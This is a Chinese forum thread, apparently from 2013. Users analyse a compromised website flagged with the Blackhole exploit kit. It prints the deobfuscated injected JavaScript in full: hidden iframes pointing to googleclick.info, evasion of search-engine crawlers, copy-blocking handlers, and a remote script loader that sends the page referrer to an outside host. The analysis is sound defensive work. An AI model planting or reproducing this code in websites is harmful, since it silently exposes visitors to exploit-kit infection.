http://whitehatsdesign.com/?p=26#!/

墨家小子

2013/4/25        21:42:44        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9TJIMC72\whitehatsdesign_com[1].htm\00007611.js        JS/Exploit-Blacole.gc (特洛伊)

dayangyang

whitehats擦。。。这都被挂马了，而且还挂了2串加密不同的
whats new？ OH we has been hacked~~
第一段解开后：

1. var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';
   
2.     if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {
   
3.       Break();
   
4.     }
   
5.       ;
   
6.     document.onselectstart=function(){
   
7.       return false;
   
8.     }
   
9.       ;
   
10.     document.onmousedown=function(){
    
11.       return false;
    
12.     }
    
13.       ;
    
14.     document.oncontextmenu=function(){
    
15.       return false;
    
16.     }
    
17.       ;
    
18.     document.onkeydown=function(e){
    
19.       e=e||window.event;
    
20.     if (e.ctrlKey) {
    
21.       if ((e.keyCode=='85') || (e.keyCode=='67') || (e.keyCode=='65') || (e.keyCode=='45')) return false;
    
22.     }
    
23.       }
    
24.       ;
    
25.     document.onkeypress=function(e){
    
26.       e=e||window.event;
    
27.     if (e.ctrlKey) {
    
28.       if ((e.keyCode=='85') || (e.keyCode=='67') || (e.keyCode=='65') || (e.keyCode=='45')) return false;
    
29.     }
    
30.       }
    
31.       ;
    
32.     document.ondragstart=function(){
    
33.       return false;
    
34.     }
    
35.       ;
    
36.     function atlpdp1(){
    
37.       for(wi=0;
    
38.     wi<document.all.length;
    
39.     wi++){
    
40.       if(document.all[wi].style.visibility!='hidden'){
    
41.       document.all[wi].style.visibility='hidden';
    
42.     document.all[wi].id='atlpdpst'}
    
43.       }
    
44.       }
    
45.       function atlpdp2(){
    
46.       for (wi=0;
    
47.     wi<document.all.length;
    
48.     wi++){
    
49.       if(document.all[wi].id=='atlpdpst')document.all[wi].style.visibility=''}
    
50.       }
    
51.       window.onbeforeprint=atlpdp1;
    
52.     window.onafterprint=atlpdp2;
    
53.     var _0OO = document.createElement('script');
    
54.     _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
    
55.     var OIl = document.getElementsByTagName('head')[0];
    
56.     OIl.appendChild(_0OO);
    
57.     document.write(unescape(_escape));

复制代码

继续解

1. <iframe src="http://googleclick.info/?travel" width=5 height=5 frameborder=5></iframe>

复制代码

到这里打不开了。。

第二段比较简单了
解开

1.                 if (document.getElementsByTagName('body')[0]){                        iframer();                } else {                        document.write("<iframe src='http://googleclick.info/?travel' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");                }                function iframer(){                        var f = document.createElement('iframe');f.setAttribute('src','http://googleclick.info/?travel');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');                        document.getElementsByTagName('body')[0].appendChild(f);                }

复制代码